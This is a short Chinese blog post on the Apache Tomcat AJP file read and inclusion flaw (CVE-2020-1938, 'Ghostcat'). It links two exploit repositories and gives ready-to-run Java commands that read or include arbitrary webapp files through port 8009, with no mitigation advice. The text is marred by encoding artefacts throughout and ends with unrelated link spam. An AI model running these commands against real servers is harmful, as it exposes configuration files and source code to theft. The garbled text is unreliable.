Apache Tomcat會(huì)開(kāi)啟AJP連接器,方便與其他Web服務(wù)器通過(guò)AJP協(xié)議進(jìn)行交互。由于Tomcat本身也內(nèi)含了HTTP服務(wù)器，因此也可以視作單獨(dú)的Web服務(wù)器。

此漏洞為文件包含漏洞，攻擊者可利用該漏洞讀取或包含 Tomcat 上所有 webapp 目錄下的任意文件，如：webapp 配置文件、源代碼等。

本次設(shè)計(jì)到的CVE：CNVD-2020-10487、CVE-2020-1938

EXP-1

https://github.com/0nise/CVE-2020-1938

apache-tomcat-8.5.32.zip 測(cè)試tomcat

任意文件讀取

java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp

文件包含

java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp

打包方式：在目錄tomcat/ajp-bug 執(zhí)行 mvn clean compile assembly:assembly

EXP-2

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

[超站]友情鏈接：

四季很好，只要有你，文娛排行榜：https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全，洞悉企業(yè)級(jí)服務(wù)市場(chǎng)：https://www.ijiandao.com/